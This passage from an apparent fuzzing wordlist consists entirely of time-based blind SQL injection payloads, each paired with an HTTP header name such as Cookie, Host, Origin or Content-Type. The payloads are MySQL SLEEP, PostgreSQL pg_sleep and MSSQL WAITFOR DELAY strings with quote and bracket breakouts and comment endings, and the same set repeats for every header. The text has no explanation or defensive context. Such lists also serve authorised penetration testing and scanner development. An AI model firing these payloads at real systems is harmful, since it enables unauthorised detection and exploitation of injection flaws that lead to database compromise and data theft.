		Cache-Control: ') or sleep(30)='
		Cache-Control: 1)) or sleep(30)#
		Cache-Control: ")) or sleep(30)="
		Cache-Control: ')) or sleep(30)='
		Cache-Control: ;waitfor delay '0:0:30'--
		Cache-Control: );waitfor delay '0:0:30'--
		Cache-Control: ';waitfor delay '0:0:30'--
		Cache-Control: ";waitfor delay '0:0:30'--
		Cache-Control: ');waitfor delay '0:0:30'--
		Cache-Control: ");waitfor delay '0:0:30'--
		Cache-Control: ));waitfor delay '0:0:30'--
		Cache-Control: '));waitfor delay '0:0:30'--
		Cache-Control: "));waitfor delay '0:0:30'--
		Cache-Control: pg_sleep(30)--
		Cache-Control: 1 or pg_sleep(30)--
		Cache-Control: " or pg_sleep(30)--
		Cache-Control: ' or pg_sleep(30)--
		Cache-Control: 1) or pg_sleep(30)--
		Cache-Control: ") or pg_sleep(30)--
		Cache-Control: ') or pg_sleep(30)--
		Cache-Control: 1)) or pg_sleep(30)--
		Cache-Control: ")) or pg_sleep(30)--
		Cache-Control: ')) or pg_sleep(30)--
		Cache-Control: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Cache-Control: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Cache-Control: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Cache-Control: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Cache-Control: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Cache-Control: SLEEP(30)#
		Cache-Control: SLEEP(30)--
		Cache-Control: SLEEP(30)="
		Cache-Control: SLEEP(30)='
		Cache-Control: or SLEEP(30)
		Cache-Control: or SLEEP(30)#
		Cache-Control: or SLEEP(30)--
		Cache-Control: or SLEEP(30)="
		Cache-Control: or SLEEP(30)='
		Cache-Control: waitfor delay '00:00:30'
		Cache-Control: waitfor delay '00:00:30'--
		Cache-Control: waitfor delay '00:00:30'#
		Cache-Control: pg_SLEEP(30)
		Cache-Control: pg_SLEEP(30)--
		Cache-Control: pg_SLEEP(30)#
		Cache-Control: or pg_SLEEP(30)
		Cache-Control: or pg_SLEEP(30)--
		Cache-Control: or pg_SLEEP(30)#
		Cache-Control: AnD SLEEP(30)
		Cache-Control: AnD SLEEP(30)--
		Cache-Control: AnD SLEEP(30)#
		Cache-Control: &&SLEEP(30)
		Cache-Control: &&SLEEP(30)--
		Cache-Control: &&SLEEP(30)#
		Cache-Control: ' AnD SLEEP(30) ANd '1
		Cache-Control: '&&SLEEP(30)&&'1
		Cache-Control: ORDER BY SLEEP(30)
		Cache-Control: ORDER BY SLEEP(30)--
		Cache-Control: ORDER BY SLEEP(30)#
		Cache-Control: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Cache-Control: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Cache-Control: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Cache-Control: + SLEEP(30) + '
		Cache-Control: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Connection: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Connection: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Connection: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Connection: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Connection: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Connection: sleep(30)#
		Connection: (select * from (select(sleep(30)))a)
		Connection: 1 or sleep(30)#
		Connection: " or sleep(30)#
		Connection: ' or sleep(30)#
		Connection: " or sleep(30)="
		Connection: ' or sleep(30)='
		Connection: 1) or sleep(30)#
		Connection: ") or sleep(30)="
		Connection: ') or sleep(30)='
		Connection: 1)) or sleep(30)#
		Connection: ")) or sleep(30)="
		Connection: ')) or sleep(30)='
		Connection: ;waitfor delay '0:0:30'--
		Connection: );waitfor delay '0:0:30'--
		Connection: ';waitfor delay '0:0:30'--
		Connection: ";waitfor delay '0:0:30'--
		Connection: ');waitfor delay '0:0:30'--
		Connection: ");waitfor delay '0:0:30'--
		Connection: ));waitfor delay '0:0:30'--
		Connection: '));waitfor delay '0:0:30'--
		Connection: "));waitfor delay '0:0:30'--
		Connection: pg_sleep(30)--
		Connection: 1 or pg_sleep(30)--
		Connection: " or pg_sleep(30)--
		Connection: ' or pg_sleep(30)--
		Connection: 1) or pg_sleep(30)--
		Connection: ") or pg_sleep(30)--
		Connection: ') or pg_sleep(30)--
		Connection: 1)) or pg_sleep(30)--
		Connection: ")) or pg_sleep(30)--
		Connection: ')) or pg_sleep(30)--
		Connection: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Connection: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Connection: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Connection: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Connection: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Connection: SLEEP(30)#
		Connection: SLEEP(30)--
		Connection: SLEEP(30)="
		Connection: SLEEP(30)='
		Connection: or SLEEP(30)
		Connection: or SLEEP(30)#
		Connection: or SLEEP(30)--
		Connection: or SLEEP(30)="
		Connection: or SLEEP(30)='
		Connection: waitfor delay '00:00:30'
		Connection: waitfor delay '00:00:30'--
		Connection: waitfor delay '00:00:30'#
		Connection: pg_SLEEP(30)
		Connection: pg_SLEEP(30)--
		Connection: pg_SLEEP(30)#
		Connection: or pg_SLEEP(30)
		Connection: or pg_SLEEP(30)--
		Connection: or pg_SLEEP(30)#
		Connection: AnD SLEEP(30)
		Connection: AnD SLEEP(30)--
		Connection: AnD SLEEP(30)#
		Connection: &&SLEEP(30)
		Connection: &&SLEEP(30)--
		Connection: &&SLEEP(30)#
		Connection: ' AnD SLEEP(30) ANd '1
		Connection: '&&SLEEP(30)&&'1
		Connection: ORDER BY SLEEP(30)
		Connection: ORDER BY SLEEP(30)--
		Connection: ORDER BY SLEEP(30)#
		Connection: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Connection: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Connection: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Connection: + SLEEP(30) + '
		Connection: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Content-Length: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Content-Length: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Content-Length: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Content-Length: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Content-Length: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Content-Length: sleep(30)#
		Content-Length: (select * from (select(sleep(30)))a)
		Content-Length: 1 or sleep(30)#
		Content-Length: " or sleep(30)#
		Content-Length: ' or sleep(30)#
		Content-Length: " or sleep(30)="
		Content-Length: ' or sleep(30)='
		Content-Length: 1) or sleep(30)#
		Content-Length: ") or sleep(30)="
		Content-Length: ') or sleep(30)='
		Content-Length: 1)) or sleep(30)#
		Content-Length: ")) or sleep(30)="
		Content-Length: ')) or sleep(30)='
		Content-Length: ;waitfor delay '0:0:30'--
		Content-Length: );waitfor delay '0:0:30'--
		Content-Length: ';waitfor delay '0:0:30'--
		Content-Length: ";waitfor delay '0:0:30'--
		Content-Length: ');waitfor delay '0:0:30'--
		Content-Length: ");waitfor delay '0:0:30'--
		Content-Length: ));waitfor delay '0:0:30'--
		Content-Length: '));waitfor delay '0:0:30'--
		Content-Length: "));waitfor delay '0:0:30'--
		Content-Length: pg_sleep(30)--
		Content-Length: 1 or pg_sleep(30)--
		Content-Length: " or pg_sleep(30)--
		Content-Length: ' or pg_sleep(30)--
		Content-Length: 1) or pg_sleep(30)--
		Content-Length: ") or pg_sleep(30)--
		Content-Length: ') or pg_sleep(30)--
		Content-Length: 1)) or pg_sleep(30)--
		Content-Length: ")) or pg_sleep(30)--
		Content-Length: ')) or pg_sleep(30)--
		Content-Length: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Content-Length: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Content-Length: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Content-Length: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Content-Length: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Content-Length: SLEEP(30)#
		Content-Length: SLEEP(30)--
		Content-Length: SLEEP(30)="
		Content-Length: SLEEP(30)='
		Content-Length: or SLEEP(30)
		Content-Length: or SLEEP(30)#
		Content-Length: or SLEEP(30)--
		Content-Length: or SLEEP(30)="
		Content-Length: or SLEEP(30)='
		Content-Length: waitfor delay '00:00:30'
		Content-Length: waitfor delay '00:00:30'--
		Content-Length: waitfor delay '00:00:30'#
		Content-Length: pg_SLEEP(30)
		Content-Length: pg_SLEEP(30)--
		Content-Length: pg_SLEEP(30)#
		Content-Length: or pg_SLEEP(30)
		Content-Length: or pg_SLEEP(30)--
		Content-Length: or pg_SLEEP(30)#
		Content-Length: AnD SLEEP(30)
		Content-Length: AnD SLEEP(30)--
		Content-Length: AnD SLEEP(30)#
		Content-Length: &&SLEEP(30)
		Content-Length: &&SLEEP(30)--
		Content-Length: &&SLEEP(30)#
		Content-Length: ' AnD SLEEP(30) ANd '1
		Content-Length: '&&SLEEP(30)&&'1
		Content-Length: ORDER BY SLEEP(30)
		Content-Length: ORDER BY SLEEP(30)--
		Content-Length: ORDER BY SLEEP(30)#
		Content-Length: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Content-Length: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Content-Length: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Content-Length: + SLEEP(30) + '
		Content-Length: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Content-Type: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Content-Type: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Content-Type: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Content-Type: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Content-Type: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Content-Type: sleep(30)#
		Content-Type: (select * from (select(sleep(30)))a)
		Content-Type: 1 or sleep(30)#
		Content-Type: " or sleep(30)#
		Content-Type: ' or sleep(30)#
		Content-Type: " or sleep(30)="
		Content-Type: ' or sleep(30)='
		Content-Type: 1) or sleep(30)#
		Content-Type: ") or sleep(30)="
		Content-Type: ') or sleep(30)='
		Content-Type: 1)) or sleep(30)#
		Content-Type: ")) or sleep(30)="
		Content-Type: ')) or sleep(30)='
		Content-Type: ;waitfor delay '0:0:30'--
		Content-Type: );waitfor delay '0:0:30'--
		Content-Type: ';waitfor delay '0:0:30'--
		Content-Type: ";waitfor delay '0:0:30'--
		Content-Type: ');waitfor delay '0:0:30'--
		Content-Type: ");waitfor delay '0:0:30'--
		Content-Type: ));waitfor delay '0:0:30'--
		Content-Type: '));waitfor delay '0:0:30'--
		Content-Type: "));waitfor delay '0:0:30'--
		Content-Type: pg_sleep(30)--
		Content-Type: 1 or pg_sleep(30)--
		Content-Type: " or pg_sleep(30)--
		Content-Type: ' or pg_sleep(30)--
		Content-Type: 1) or pg_sleep(30)--
		Content-Type: ") or pg_sleep(30)--
		Content-Type: ') or pg_sleep(30)--
		Content-Type: 1)) or pg_sleep(30)--
		Content-Type: ")) or pg_sleep(30)--
		Content-Type: ')) or pg_sleep(30)--
		Content-Type: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Content-Type: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Content-Type: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Content-Type: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Content-Type: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Content-Type: SLEEP(30)#
		Content-Type: SLEEP(30)--
		Content-Type: SLEEP(30)="
		Content-Type: SLEEP(30)='
		Content-Type: or SLEEP(30)
		Content-Type: or SLEEP(30)#
		Content-Type: or SLEEP(30)--
		Content-Type: or SLEEP(30)="
		Content-Type: or SLEEP(30)='
		Content-Type: waitfor delay '00:00:30'
		Content-Type: waitfor delay '00:00:30'--
		Content-Type: waitfor delay '00:00:30'#
		Content-Type: pg_SLEEP(30)
		Content-Type: pg_SLEEP(30)--
		Content-Type: pg_SLEEP(30)#
		Content-Type: or pg_SLEEP(30)
		Content-Type: or pg_SLEEP(30)--
		Content-Type: or pg_SLEEP(30)#
		Content-Type: AnD SLEEP(30)
		Content-Type: AnD SLEEP(30)--
		Content-Type: AnD SLEEP(30)#
		Content-Type: &&SLEEP(30)
		Content-Type: &&SLEEP(30)--
		Content-Type: &&SLEEP(30)#
		Content-Type: ' AnD SLEEP(30) ANd '1
		Content-Type: '&&SLEEP(30)&&'1
		Content-Type: ORDER BY SLEEP(30)
		Content-Type: ORDER BY SLEEP(30)--
		Content-Type: ORDER BY SLEEP(30)#
		Content-Type: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Content-Type: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Content-Type: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Content-Type: + SLEEP(30) + '
		Content-Type: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Cookie: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Cookie: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Cookie: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Cookie: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Cookie: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Cookie: sleep(30)#
		Cookie: (select * from (select(sleep(30)))a)
		Cookie: 1 or sleep(30)#
		Cookie: " or sleep(30)#
		Cookie: ' or sleep(30)#
		Cookie: " or sleep(30)="
		Cookie: ' or sleep(30)='
		Cookie: 1) or sleep(30)#
		Cookie: ") or sleep(30)="
		Cookie: ') or sleep(30)='
		Cookie: 1)) or sleep(30)#
		Cookie: ")) or sleep(30)="
		Cookie: ')) or sleep(30)='
		Cookie: ;waitfor delay '0:0:30'--
		Cookie: );waitfor delay '0:0:30'--
		Cookie: ';waitfor delay '0:0:30'--
		Cookie: ";waitfor delay '0:0:30'--
		Cookie: ');waitfor delay '0:0:30'--
		Cookie: ");waitfor delay '0:0:30'--
		Cookie: ));waitfor delay '0:0:30'--
		Cookie: '));waitfor delay '0:0:30'--
		Cookie: "));waitfor delay '0:0:30'--
		Cookie: pg_sleep(30)--
		Cookie: 1 or pg_sleep(30)--
		Cookie: " or pg_sleep(30)--
		Cookie: ' or pg_sleep(30)--
		Cookie: 1) or pg_sleep(30)--
		Cookie: ") or pg_sleep(30)--
		Cookie: ') or pg_sleep(30)--
		Cookie: 1)) or pg_sleep(30)--
		Cookie: ")) or pg_sleep(30)--
		Cookie: ')) or pg_sleep(30)--
		Cookie: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Cookie: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Cookie: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Cookie: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Cookie: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Cookie: SLEEP(30)#
		Cookie: SLEEP(30)--
		Cookie: SLEEP(30)="
		Cookie: SLEEP(30)='
		Cookie: or SLEEP(30)
		Cookie: or SLEEP(30)#
		Cookie: or SLEEP(30)--
		Cookie: or SLEEP(30)="
		Cookie: or SLEEP(30)='
		Cookie: waitfor delay '00:00:30'
		Cookie: waitfor delay '00:00:30'--
		Cookie: waitfor delay '00:00:30'#
		Cookie: pg_SLEEP(30)
		Cookie: pg_SLEEP(30)--
		Cookie: pg_SLEEP(30)#
		Cookie: or pg_SLEEP(30)
		Cookie: or pg_SLEEP(30)--
		Cookie: or pg_SLEEP(30)#
		Cookie: AnD SLEEP(30)
		Cookie: AnD SLEEP(30)--
		Cookie: AnD SLEEP(30)#
		Cookie: &&SLEEP(30)
		Cookie: &&SLEEP(30)--
		Cookie: &&SLEEP(30)#
		Cookie: ' AnD SLEEP(30) ANd '1
		Cookie: '&&SLEEP(30)&&'1
		Cookie: ORDER BY SLEEP(30)
		Cookie: ORDER BY SLEEP(30)--
		Cookie: ORDER BY SLEEP(30)#
		Cookie: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Cookie: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Cookie: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Cookie: + SLEEP(30) + '
		Cookie: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Date: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Date: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Date: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Date: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Date: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Date: sleep(30)#
		Date: (select * from (select(sleep(30)))a)
		Date: 1 or sleep(30)#
		Date: " or sleep(30)#
		Date: ' or sleep(30)#
		Date: " or sleep(30)="
		Date: ' or sleep(30)='
		Date: 1) or sleep(30)#
		Date: ") or sleep(30)="
		Date: ') or sleep(30)='
		Date: 1)) or sleep(30)#
		Date: ")) or sleep(30)="
		Date: ')) or sleep(30)='
		Date: ;waitfor delay '0:0:30'--
		Date: );waitfor delay '0:0:30'--
		Date: ';waitfor delay '0:0:30'--
		Date: ";waitfor delay '0:0:30'--
		Date: ');waitfor delay '0:0:30'--
		Date: ");waitfor delay '0:0:30'--
		Date: ));waitfor delay '0:0:30'--
		Date: '));waitfor delay '0:0:30'--
		Date: "));waitfor delay '0:0:30'--
		Date: pg_sleep(30)--
		Date: 1 or pg_sleep(30)--
		Date: " or pg_sleep(30)--
		Date: ' or pg_sleep(30)--
		Date: 1) or pg_sleep(30)--
		Date: ") or pg_sleep(30)--
		Date: ') or pg_sleep(30)--
		Date: 1)) or pg_sleep(30)--
		Date: ")) or pg_sleep(30)--
		Date: ')) or pg_sleep(30)--
		Date: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Date: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Date: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Date: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Date: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Date: SLEEP(30)#
		Date: SLEEP(30)--
		Date: SLEEP(30)="
		Date: SLEEP(30)='
		Date: or SLEEP(30)
		Date: or SLEEP(30)#
		Date: or SLEEP(30)--
		Date: or SLEEP(30)="
		Date: or SLEEP(30)='
		Date: waitfor delay '00:00:30'
		Date: waitfor delay '00:00:30'--
		Date: waitfor delay '00:00:30'#
		Date: pg_SLEEP(30)
		Date: pg_SLEEP(30)--
		Date: pg_SLEEP(30)#
		Date: or pg_SLEEP(30)
		Date: or pg_SLEEP(30)--
		Date: or pg_SLEEP(30)#
		Date: AnD SLEEP(30)
		Date: AnD SLEEP(30)--
		Date: AnD SLEEP(30)#
		Date: &&SLEEP(30)
		Date: &&SLEEP(30)--
		Date: &&SLEEP(30)#
		Date: ' AnD SLEEP(30) ANd '1
		Date: '&&SLEEP(30)&&'1
		Date: ORDER BY SLEEP(30)
		Date: ORDER BY SLEEP(30)--
		Date: ORDER BY SLEEP(30)#
		Date: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Date: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Date: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Date: + SLEEP(30) + '
		Date: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Host: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Host: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Host: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Host: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Host: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Host: sleep(30)#
		Host: (select * from (select(sleep(30)))a)
		Host: 1 or sleep(30)#
		Host: " or sleep(30)#
		Host: ' or sleep(30)#
		Host: " or sleep(30)="
		Host: ' or sleep(30)='
		Host: 1) or sleep(30)#
		Host: ") or sleep(30)="
		Host: ') or sleep(30)='
		Host: 1)) or sleep(30)#
		Host: ")) or sleep(30)="
		Host: ')) or sleep(30)='
		Host: ;waitfor delay '0:0:30'--
		Host: );waitfor delay '0:0:30'--
		Host: ';waitfor delay '0:0:30'--
		Host: ";waitfor delay '0:0:30'--
		Host: ');waitfor delay '0:0:30'--
		Host: ");waitfor delay '0:0:30'--
		Host: ));waitfor delay '0:0:30'--
		Host: '));waitfor delay '0:0:30'--
		Host: "));waitfor delay '0:0:30'--
		Host: pg_sleep(30)--
		Host: 1 or pg_sleep(30)--
		Host: " or pg_sleep(30)--
		Host: ' or pg_sleep(30)--
		Host: 1) or pg_sleep(30)--
		Host: ") or pg_sleep(30)--
		Host: ') or pg_sleep(30)--
		Host: 1)) or pg_sleep(30)--
		Host: ")) or pg_sleep(30)--
		Host: ')) or pg_sleep(30)--
		Host: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Host: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Host: SLEEP(30)#
		Host: SLEEP(30)--
		Host: SLEEP(30)="
		Host: SLEEP(30)='
		Host: or SLEEP(30)
		Host: or SLEEP(30)#
		Host: or SLEEP(30)--
		Host: or SLEEP(30)="
		Host: or SLEEP(30)='
		Host: waitfor delay '00:00:30'
		Host: waitfor delay '00:00:30'--
		Host: waitfor delay '00:00:30'#
		Host: pg_SLEEP(30)
		Host: pg_SLEEP(30)--
		Host: pg_SLEEP(30)#
		Host: or pg_SLEEP(30)
		Host: or pg_SLEEP(30)--
		Host: or pg_SLEEP(30)#
		Host: AnD SLEEP(30)
		Host: AnD SLEEP(30)--
		Host: AnD SLEEP(30)#
		Host: &&SLEEP(30)
		Host: &&SLEEP(30)--
		Host: &&SLEEP(30)#
		Host: ' AnD SLEEP(30) ANd '1
		Host: '&&SLEEP(30)&&'1
		Host: ORDER BY SLEEP(30)
		Host: ORDER BY SLEEP(30)--
		Host: ORDER BY SLEEP(30)#
		Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Host: + SLEEP(30) + '
		Host: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Origin: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Origin: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Origin: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Origin: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Origin: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Origin: sleep(30)#
		Origin: (select * from (select(sleep(30)))a)
		Origin: 1 or sleep(30)#
		Origin: " or sleep(30)#
		Origin: ' or sleep(30)#
		Origin: " or sleep(30)="
		Origin: ' or sleep(30)='
		Origin: 1) or sleep(30)#
		Origin: ") or sleep(30)="
		Origin: ') or sleep(30)='
		Origin: 1)) or sleep(30)#
		Origin: ")) or sleep(30)="
		Origin: ')) or sleep(30)='
		Origin: ;waitfor delay '0:0:30'--
		Origin: );waitfor delay '0:0:30'--
		Origin: ';waitfor delay '0:0:30'--
		Origin: ";waitfor delay '0:0:30'--
		Origin: ');waitfor delay '0:0:30'--
		Origin: ");waitfor delay '0:0:30'--
		Origin: ));waitfor delay '0:0:30'--
		Origin: '));waitfor delay '0:0:30'--
		Origin: "));waitfor delay '0:0:30'--
		Origin: pg_sleep(30)--
		Origin: 1 or pg_sleep(30)--
		Origin: " or pg_sleep(30)--
		Origin: ' or pg_sleep(30)--
		Origin: 1) or pg_sleep(30)--
		Origin: ") or pg_sleep(30)--
		Origin: ') or pg_sleep(30)--
		Origin: 1)) or pg_sleep(30)--
		Origin: ")) or pg_sleep(30)--
		Origin: ')) or pg_sleep(30)--
		Origin: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Origin: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Origin: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Origin: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Origin: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Origin: SLEEP(30)#
		Origin: SLEEP(30)--
		Origin: SLEEP(30)="
		Origin: SLEEP(30)='
		Origin: or SLEEP(30)
		Origin: or SLEEP(30)#
		Origin: or SLEEP(30)--
		Origin: or SLEEP(30)="
		Origin: or SLEEP(30)='
		Origin: waitfor delay '00:00:30'
		Origin: waitfor delay '00:00:30'--
		Origin: waitfor delay '00:00:30'#
		Origin: pg_SLEEP(30)
		Origin: pg_SLEEP(30)--
		Origin: pg_SLEEP(30)#
		Origin: or pg_SLEEP(30)
		Origin: or pg_SLEEP(30)--
		Origin: or pg_SLEEP(30)#
		Origin: AnD SLEEP(30)
		Origin: AnD SLEEP(30)--
		Origin: AnD SLEEP(30)#
		Origin: &&SLEEP(30)
		Origin: &&SLEEP(30)--
		Origin: &&SLEEP(30)#
		Origin: ' AnD SLEEP(30) ANd '1
		Origin: '&&SLEEP(30)&&'1
		Origin: ORDER BY SLEEP(30)
		Origin: ORDER BY SLEEP(30)--
		Origin: ORDER BY SLEEP(30)#
		Origin: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Origin: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Origin: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Origin: + SLEEP(30) + '
		Origin: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Requested-With: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Requested-With: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Requested-With: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Requested-With: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Requested-With: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Requested-With: sleep(30)#
		X-Requested-With: (select * from (select(sleep(30)))a)
		X-Requested-With: 1 or sleep(30)#
